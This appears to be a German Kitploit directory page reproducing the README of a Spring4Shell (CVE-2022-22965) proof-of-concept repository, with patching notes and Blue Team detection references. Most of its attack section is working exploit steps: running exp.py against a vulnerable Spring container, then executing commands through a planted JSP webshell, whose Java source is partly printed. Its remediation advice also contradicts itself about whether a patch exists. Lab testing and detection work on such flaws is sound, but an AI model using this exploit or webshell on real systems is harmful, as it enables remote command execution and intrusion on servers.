Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SpringShell — Spring4Shell - Spring Core RCE - CVE-2022-22965 | Kitploit
Tools/GitHubGitHub/thegejr/springshell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubthegejr/springshell

SpringShell

Spring4Shell - Spring Core RCE - CVE-2022-22965

Repository anzeigen
131821vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Spring Core RCE - CVE-2022-22965

Nach Spring Cloud, am 29. März, brach eine weitere schwerwiegende Schwachstelle von Spring im Internet aus: Spring Core RCE

Am 31. März veröffentlichte Spring neue Versionen, die die Schwachstelle beheben. Siehe Abschnitt Patching.

Am 31. März wurde der Schwachstelle schließlich eine CVE-Nummer zugewiesen mit einem CVSS-Score von 9.8 (KRITISCH)

Proof-of-Concept

Der Exploit ist sehr einfach zu verwenden, daher der sehr hohe CVSS-Score von 9.8.

Um die Schwachstelle zu testen, führen Sie Folgendes aus.

Starten Sie ein anfälliges Docker-Image von Spring.

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

Dies bindet das anfällige Spring an die Adresse localhost:8082.

Überprüfen Sie, ob das Image korrekt gestartet ist, mit curl

root@kitploit:~
curl http://localhost:8082

Eine Antwort von ok sollte zurückgegeben werden.

Lassen Sie uns nun das anfällige Image ausnutzen!

Tool herunterladen
root@kitploit:~
python3 exp.py --url http://localhost:8082

Eine Antwort von The vulnerability exists .... sollte zurückgegeben werden.

Sie können die Schwachstelle nun mit curl ausnutzen

root@kitploit:~
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

Circulating coding poc

Der Exploit wurde bisher unter exp.py hochgeladen
Zirkulierender Coding PoC
Unangenehme Situation

Patching

Spring hat nun neue Versionen veröffentlicht, die diese CVE beheben. Siehe Springs Ankündigung.

Der Commit, der die Schwachstelle behoben hat

Auswirkungen der Schwachstelle

  1. JDK Version 9 und höher
  2. Spring Framework oder abgeleitete Frameworks werden verwendet

Vorschlag zur Fehlerbehebung

Derzeit hat Spring noch keinen offiziellen Patch veröffentlicht. Es wird empfohlen, die JDK-Version zu reduzieren, als vorübergehende Lösung.

Blue Team

Yara

  • Florian Roth - Spring4Shell webshells

Sigma

  • Emanuele De Lucia - Erstellung von .jsp Webshells

SPLUNK

  • Alex John - Splunk-Erkennungs-SPL